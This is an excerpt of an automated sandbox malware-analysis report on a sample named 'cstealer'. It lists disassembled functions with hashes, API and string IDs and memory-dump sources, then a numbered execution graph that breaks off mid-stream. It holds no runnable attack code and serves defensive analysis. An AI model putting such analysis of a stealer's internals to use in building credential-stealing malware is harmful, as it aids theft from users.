                                                                                                                                                            • Instruction Fuzzy Hash: DF417E36A09B1289EB24DF25E9800B967D5EB44FD4F544076ED4E8BB89DF3CEE819340
                                                                                                                                                            Function 00007FF6957FD9E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                                                                                            • Instruction ID: b78c6abf162a42943f83324d90dc5999837a4762d7da547ee0f2811ecc2e3614
                                                                                                                                                            • Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                                                                                            • Instruction Fuzzy Hash: B541B132A19A8185DB20CF25E8443BAA7A1FB88BD4F444031EE4DCB798EF3CD941D750
                                                                                                                                                            Function 00000271DC6826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction ID: f42f6fd569d43ea4382f1c0abe0182af73a8386dd1a9165ea43a17db13baa3af
                                                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                            • Instruction Fuzzy Hash: F641A8B271AA4089DB31DF69E4483AA77A0FB98794F904421EE4D87794EF7CC455CB40
                                                                                                                                                            Function 00007FF695800108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                            • Opcode ID: d9863b25c12ac0fefb21a7bf7c484e36ee931251d3e87798423fc60bfb7291bd
                                                                                                                                                            • Instruction ID: d878d100043e8d56e43cf19c06570f0211f114040bd550dbcb535f3d6b55846f
                                                                                                                                                            • Opcode Fuzzy Hash: d9863b25c12ac0fefb21a7bf7c484e36ee931251d3e87798423fc60bfb7291bd
                                                                                                                                                            • Instruction Fuzzy Hash: 8221C122A1969181EB30AB25D5442AE73E2FB84F84F858076DA8D87284DF7CEE45CB41
                                                                                                                                                            Function 00007FF6957E2B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                            • Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                                                                                            • Instruction ID: 8ccb5e653de5139363814517a7042d39eab72c3539744104a5aa713e10278eb3
                                                                                                                                                            • Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                                                                                            • Instruction Fuzzy Hash: AE21887262878191E730DB20F4516EAA394FF84B84F801176D64D879A9DF3CD709CB00
                                                                                                                                                            Function 00007FF6957E2C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: Error detected
                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                            • Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                                                                                            • Instruction ID: 8c0444ec1c26dbd7c325b086ac862f1d25ecb2fb465f17fa7a87c455d145822c
                                                                                                                                                            • Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                                                                                            • Instruction Fuzzy Hash: C421677262878191E730DB10F4516EAA394FF94B84F805176E78D87A69DF3CDB05CB40
                                                                                                                                                            Function 00007FF6957F0678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                                                                                            • Instruction ID: 16162d5174ec1c40d46afcb172cf5d9581328b9f54016fcbfc492eb4baacea91
                                                                                                                                                            • Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                                                                                            • Instruction Fuzzy Hash: B1114932609B8182EB608F25E400269B7E1FB88B88F184271DE8D4BB64DF3CC951CB00
                                                                                                                                                            Function 00000271DC6794A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction ID: e87662b7ffd1269b0497a5aa786c94faae08ef5a1363e8958afb757bc222f382
                                                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                            • Instruction Fuzzy Hash: 41112132219B4086EB618F59E44435977E5FB88B94F584620DF8C07B98EF3CC561CB00
                                                                                                                                                            Function 00007FF695801594 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                            • Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                                                                                            • Instruction ID: 8e895c3d840ad1f5f2e2fb8943ec80ed47fd959efa45e4905e6ef3efc42ede33
                                                                                                                                                            • Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                                                                                            • Instruction Fuzzy Hash: 0701716191D65286F7309F7098522BA63E0EF45B58F400476D94ECA695EE2CEA04DB14
                                                                                                                                                            Function 00000271DC647356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction ID: e24a849e4829551db3e8bc093f8c75e09aa5b21a45df6bee98af7aa06a626cc0
                                                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                                            • Instruction Fuzzy Hash: 9EE086B1655B8494DF118F65E8542D873A1DF68B64B589122D95C46311FA3CD1F9C700
                                                                                                                                                            Function 00000271DC6473B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __std_exception_copy
                                                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction ID: 56ada5da361412997f75e9e926602d97c2a815f801f531dff807d9af8eab2ada
                                                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                                            • Instruction Fuzzy Hash: 63E086B1615B4484DF118F65D8541D87361EB68B54B989122C94C46311FA3CE1F5C700
                                                                                                                                                            Function 00000271DC671BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 756756679-0
                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction ID: 344fe1eeea64fa653468000672f2fe16f1c501ed5641cdfbedc696ed478d3263
                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction Fuzzy Hash: 52116375606B4489EE64DFDE940836A63A1FF89FC0F584825DF4D577A6EE38C4518700
                                                                                                                                                            Function 00000271DC671268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction ID: f1886c7b2c9d4fe48e264ab43f107b5e51246b2145f34501438fd78b7e8d6320
                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction Fuzzy Hash: 1FE03075602A048AE7148F9AD80834A36E1EF89F05F4484148B4907392DF7DC4A5CB50

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:9.9%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                            Total number of Limit Nodes:41
                                                                                                                                                            execution_graph 20889 7ff6d6ebbea9 20890 7ff6d6ebbeb8 20889->20890 20892 7ff6d6ebbec2 20889->20892 20893 7ff6d6eb1208 LeaveCriticalSection 20890->20893 19949 7ff6d6eb1720 19950 7ff6d6eb1744 19949->19950 19953 7ff6d6eb1754 19949->19953 19951 7ff6d6ea5cb4 _set_fmode 11 API calls 19950->19951 19974 7ff6d6eb1749 19951->19974 19952 7ff6d6eb1a34 19954 7ff6d6ea5cb4 _set_fmode 11 API calls 19952->19954 19953->19952 19955 7ff6d6eb1776 19953->19955 19956 7ff6d6eb1a39 19954->19956 19957 7ff6d6eb1797 19955->19957 20080 7ff6d6eb1ddc 19955->20080 19959 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19956->19959 19960 7ff6d6eb1809 19957->19960 19962 7ff6d6eb17bd 19957->19962 19966 7ff6d6eb17fd 19957->19966 19959->19974 19964 7ff6d6eaf948 _set_fmode 11 API calls 19960->19964 19979 7ff6d6eb17cc 19960->19979 19961 7ff6d6eb18b6 19973 7ff6d6eb18d3 19961->19973 19980 7ff6d6eb1925 19961->19980 20095 7ff6d6eaa474 19962->20095 19967 7ff6d6eb181f 19964->19967 19966->19961 19966->19979 20101 7ff6d6eb81dc 19966->20101 19970 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19970 19969 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19969->19974 19975 7ff6d6eb182d 19970->19975 19971 7ff6d6eb17e5 19971->19966 19978 7ff6d6eb1ddc 45 API calls 19971->19978 19972 7ff6d6eb17c7 19976 7ff6d6ea5cb4 _set_fmode 11 API calls 19972->19976 19977 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19973->19977 19975->19966 19975->19979 19983 7ff6d6eaf948 _set_fmode 11 API calls 19975->19983 19976->19979 19981 7ff6d6eb18dc 19977->19981 19978->19966 19979->19969 19980->19979 19982 7ff6d6eb422c 40 API calls 19980->19982 19989 7ff6d6eb18e1 19981->19989 20137 7ff6d6eb422c 19981->20137 19984 7ff6d6eb1962 19982->19984 19987 7ff6d6eb184f 19983->19987 19985 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19984->19985 19988 7ff6d6eb196c 19985->19988 19992 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19987->19992 19988->19979 19988->19989 19990 7ff6d6eb1a28 19989->19990 19995 7ff6d6eaf948 _set_fmode 11 API calls 19989->19995 19994 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19990->19994 19991 7ff6d6eb190d 19993 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19991->19993 19992->19966 19993->19989 19994->19974 19996 7ff6d6eb19b0 19995->19996 19997 7ff6d6eb19c1 19996->19997 19998 7ff6d6eb19b8 19996->19998 20000 7ff6d6eab25c __std_exception_copy 37 API calls 19997->20000 19999 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19998->19999 20001 7ff6d6eb19bf 19999->20001 20002 7ff6d6eb19d0 20000->20002 20007 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20001->20007 20003 7ff6d6eb1a63 20002->20003 20004 7ff6d6eb19d8 20002->20004 20006 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20003->20006 20146 7ff6d6eb82f4 20004->20146 20009 7ff6d6eb1a77 20006->20009 20007->19974 20012 7ff6d6eb1aa0 20009->20012 20020 7ff6d6eb1ab0 20009->20020 20010 7ff6d6eb1a20 20015 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20010->20015 20011 7ff6d6eb19ff 20013 7ff6d6ea5cb4 _set_fmode 11 API calls 20011->20013 20014 7ff6d6ea5cb4 _set_fmode 11 API calls 20012->20014 20016 7ff6d6eb1a04 20013->20016 20017 7ff6d6eb1aa5 20014->20017 20015->19990 20018 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20016->20018 20018->20001 20019 7ff6d6eb1d93 20022 7ff6d6ea5cb4 _set_fmode 11 API calls 20019->20022 20020->20019 20021 7ff6d6eb1ad2 20020->20021 20023 7ff6d6eb1aef 20021->20023 20165 7ff6d6eb1ec4 20021->20165 20024 7ff6d6eb1d98 20022->20024 20027 7ff6d6eb1b63 20023->20027 20029 7ff6d6eb1b17 20023->20029 20036 7ff6d6eb1b57 20023->20036 20026 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20024->20026 20026->20017 20032 7ff6d6eaf948 _set_fmode 11 API calls 20027->20032 20047 7ff6d6eb1b26 20027->20047 20050 7ff6d6eb1b8b 20027->20050 20028 7ff6d6eb1c16 20041 7ff6d6eb1c33 20028->20041 20046 7ff6d6eb1c86 20028->20046 20180 7ff6d6eaa4b0 20029->20180 20037 7ff6d6eb1b7d 20032->20037 20034 7ff6d6eaf948 _set_fmode 11 API calls 20040 7ff6d6eb1bad 20034->20040 20035 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20035->20017 20036->20028 20036->20047 20186 7ff6d6eb809c 20036->20186 20044 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20037->20044 20038 7ff6d6eb1b21 20045 7ff6d6ea5cb4 _set_fmode 11 API calls 20038->20045 20039 7ff6d6eb1b3f 20039->20036 20049 7ff6d6eb1ec4 45 API calls 20039->20049 20042 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20040->20042 20043 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20041->20043 20042->20036 20048 7ff6d6eb1c3c 20043->20048 20044->20050 20045->20047 20046->20047 20051 7ff6d6eb422c 40 API calls 20046->20051 20047->20035 20054 7ff6d6eb422c 40 API calls 20048->20054 20056 7ff6d6eb1c42 20048->20056 20049->20036 20050->20034 20050->20036 20050->20047 20052 7ff6d6eb1cc4 20051->20052 20053 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20052->20053 20055 7ff6d6eb1cce 20053->20055 20058 7ff6d6eb1c6e 20054->20058 20055->20047 20055->20056 20057 7ff6d6eb1d87 20056->20057 20061 7ff6d6eaf948 _set_fmode 11 API calls 20056->20061 20060 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20057->20060 20059 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20058->20059 20059->20056 20060->20017 20062 7ff6d6eb1d13 20061->20062 20063 7ff6d6eb1d24 20062->20063 20064 7ff6d6eb1d1b 20062->20064 20065 7ff6d6eb1344 _wfindfirst32i64 37 API calls 20063->20065 20066 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20064->20066 20067 7ff6d6eb1d32 20065->20067 20068 7ff6d6eb1d22 20066->20068 20069 7ff6d6eb1dc7 20067->20069 20070 7ff6d6eb1d3a SetEnvironmentVariableW 20067->20070 20074 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20068->20074 20073 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20069->20073 20071 7ff6d6eb1d5e 20070->20071 20072 7ff6d6eb1d7f 20070->20072 20075 7ff6d6ea5cb4 _set_fmode 11 API calls 20071->20075 20077 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20072->20077 20076 7ff6d6eb1ddb 20073->20076 20074->20017 20078 7ff6d6eb1d63 20075->20078 20077->20057 20079 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20078->20079 20079->20068 20081 7ff6d6eb1e11 20080->20081 20082 7ff6d6eb1df9 20080->20082 20083 7ff6d6eaf948 _set_fmode 11 API calls 20081->20083 20082->19957 20084 7ff6d6eb1e35 20083->20084 20085 7ff6d6eb1e96 20084->20085 20089 7ff6d6eaf948 _set_fmode 11 API calls 20084->20089 20090 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20084->20090 20091 7ff6d6eab25c __std_exception_copy 37 API calls 20084->20091 20092 7ff6d6eb1ea5 20084->20092 20094 7ff6d6eb1eba 20084->20094 20087 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20085->20087 20086 7ff6d6eab2bc _CreateFrameInfo 45 API calls 20088 7ff6d6eb1ec0 20086->20088 20087->20082 20089->20084 20090->20084 20091->20084 20093 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 20092->20093 20093->20094 20094->20086 20096 7ff6d6eaa484 20095->20096 20097 7ff6d6eaa48d 20095->20097 20096->20097 20210 7ff6d6ea9f4c 20096->20210 20097->19971 20097->19972 20102 7ff6d6eb81e9 20101->20102 20103 7ff6d6eb738c 20101->20103 20105 7ff6d6ea5788 45 API calls 20102->20105 20104 7ff6d6eb7399 20103->20104 20110 7ff6d6eb73cf 20103->20110 20107 7ff6d6ea5cb4 _set_fmode 11 API calls 20104->20107 20125 7ff6d6eb7340 20104->20125 20106 7ff6d6eb821d 20105->20106 20109 7ff6d6eb8222 20106->20109 20113 7ff6d6eb8233 20106->20113 20118 7ff6d6eb824a 20106->20118 20111 7ff6d6eb73a3 20107->20111 20108 7ff6d6eb73f9 20112 7ff6d6ea5cb4 _set_fmode 11 API calls 20108->20112 20109->19966 20110->20108 20114 7ff6d6eb741e 20110->20114 20115 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20111->20115 20116 7ff6d6eb73fe 20112->20116 20119 7ff6d6ea5cb4 _set_fmode 11 API calls 20113->20119 20121 7ff6d6ea5788 45 API calls 20114->20121 20128 7ff6d6eb7409 20114->20128 20120 7ff6d6eb73ae 20115->20120 20117 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20116->20117 20117->20128 20123 7ff6d6eb8254 20118->20123 20124 7ff6d6eb8266 20118->20124 20122 7ff6d6eb8238 20119->20122 20120->19966 20121->20128 20129 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20122->20129 20130 7ff6d6ea5cb4 _set_fmode 11 API calls 20123->20130 20126 7ff6d6eb828e 20124->20126 20127 7ff6d6eb8277 20124->20127 20125->19966 20442 7ff6d6eba004 20126->20442 20433 7ff6d6eb73dc 20127->20433 20128->19966 20129->20109 20133 7ff6d6eb8259 20130->20133 20135 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20133->20135 20135->20109 20136 7ff6d6ea5cb4 _set_fmode 11 API calls 20136->20109 20138 7ff6d6eb424e 20137->20138 20140 7ff6d6eb426b 20137->20140 20139 